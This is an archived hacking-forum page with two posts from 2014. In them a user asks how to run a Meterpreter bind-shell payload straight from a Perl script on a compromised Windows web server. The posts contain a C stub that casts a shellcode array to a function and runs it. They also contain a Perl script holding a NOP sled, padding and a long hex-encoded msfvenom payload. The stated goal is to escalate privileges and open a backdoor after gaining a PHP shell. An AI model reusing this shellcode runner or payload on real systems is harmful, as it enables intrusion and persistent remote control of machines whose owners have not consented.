This forum is in archive mode. You will not be able to post new content.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - sopinha

Pages: [1]
1
Scripting Languages / Re: [Perl] Running meterpreter payload directly from Perl script
« on: March 09, 2014, 07:08:51 AM »
Let's say I am pentesting a Windows webserver and somehow get a PHP shell. Now, the owner of the Apache server is not System, so I want to elevate privileges somehow. I try to run a binary file in the target machine, containing a meterpreter payload, which I compiled from the C code:

Code: [Select]
// Our Meterpreter code goes here
unsigned char payload[]="<shellcode>";

// Push Meterpreter into memory
int main(void) { ((void (*)())payload)();}
Where <shellcode> refers to the code obtained from msfvenom to initiate a meterpreter bind tcp handler on the target machine, which will listen for incoming connections.
But as I try to run this binary file, I notice that I don't have enough privileges to run it, and there is no folder in the server from where I can run it. So then I notice the server has Perl installed and I wonder, if I run a script in Perl which behaves the same way as the compiled C code I tried to execute, would it be possible to create the backdoor directly from the script?
So my main question here is: is there any way to emulate the cast ((void (*)()) in Perl to push the payload into memory?


2
Scripting Languages / [Perl] Running meterpreter payload directly from Perl script
« on: March 09, 2014, 01:54:44 AM »
I was wondering if it was possible to run a payload directly from the execution of a Perl script in a compromised machine (with Perl installed).

Having the following code, how do I run the contents of $shellcode from the script?

Code: [Select]
my $junk = "\x90" x 504;

my $shellcode="\x90" x 50;

$shellcode=$shellcode.
"\xba\xce\xb2\xa4\x42\xdd\xc0\xd9\x74\x24\xf4\x5e\x31\xc9" .
"\xb1\x4a\x31\x56\x15\x83\xc6\x04\x03\x56\x11\xe2\x3b\x4e" .
"\x4c\xc4\xc3\xaf\x8d\xa9\x4a\x4a\xbc\xfb\x28\x1e\xed\xcb" .
"\x3b\x72\x1e\xa7\x69\x67\x95\xc5\xa5\x88\x1e\x63\x93\xa7" .
"\x9f\x45\x1b\x6b\x63\xc7\xe7\x76\xb0\x27\xd6\xb8\xc5\x26" .
"\x1f\xa4\x26\x7a\xc8\xa2\x95\x6b\x7d\xf6\x25\x07\xcd\xe7" .
"\x2d\xf4\x87\x06\x1f\xab\x9c\x50\xbf\x4d\x71\xe9\xf6\x55" .
"\x96\xd2\x41\xed\x6c\xa0\x53\x27\xbd\x49\x62\x07\x11\x74" .
"\x4a\x8a\x68\xb0\x6d\x75\x1f\xca\x8d\x08\x27\x09\xef\xd6" .
"\xa2\x8c\x57\x9c\x14\x75\x69\x71\xc2\xfe\x65\x3e\x81\x59" .
"\x6a\xc1\x46\xd2\x96\x4a\x69\x35\x1f\x08\x4d\x91\x7b\xca" .
"\xec\x80\x21\xbd\x11\xd2\x8e\x62\xb7\x98\x3d\x76\xce\xc2" .
"\x29\xbb\xe2\xfc\xa9\xd3\x75\x8e\x9b\x7c\x2d\x18\x90\xf5" .
"\xeb\xdf\xd7\x2f\x4b\x4f\x26\xd0\xab\x59\xed\x84\xfb\xf1" .
"\xc4\xa4\x90\x01\xe8\x70\x36\x52\x46\x2b\xf6\x02\x26\x9b" .
"\x9e\x48\xa9\xc4\xbe\x72\x63\x6d\x0f\x56\xdf\xfa\x6d\x68" .
"\xf1\xa6\xf8\x8e\x9b\x46\xac\x19\x34\xa5\x8b\x91\xa3\xd6" .
"\xfe\x8d\x7c\x41\xb7\xdb\xbb\x6e\x48\xce\xef\xc3\xe1\x99" .
"\x7b\x08\x36\xbb\x7b\x05\x1f\xac\xec\xd3\xf1\x9f\x8d\xe4" .
"\xd8\x4a\x4e\x71\xe6\xdc\x19\xed\xe4\x39\x6d\xb2\x17\x6c" .
"\xe5\x7b\x8d\xcf\x92\x83\x41\xd0\x62\xd2\x0b\xd0\x0a\x82" .
"\x6f\x83\x2f\xcd\xba\xb7\xe3\x58\x44\xee\x50\xca\x2c\x0c" .
"\x8e\x3c\xf3\xef\xe5\xbc\xc8\x39\xc0\x3a\x38\x4c\x20\x87";

Pages: [1]


Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.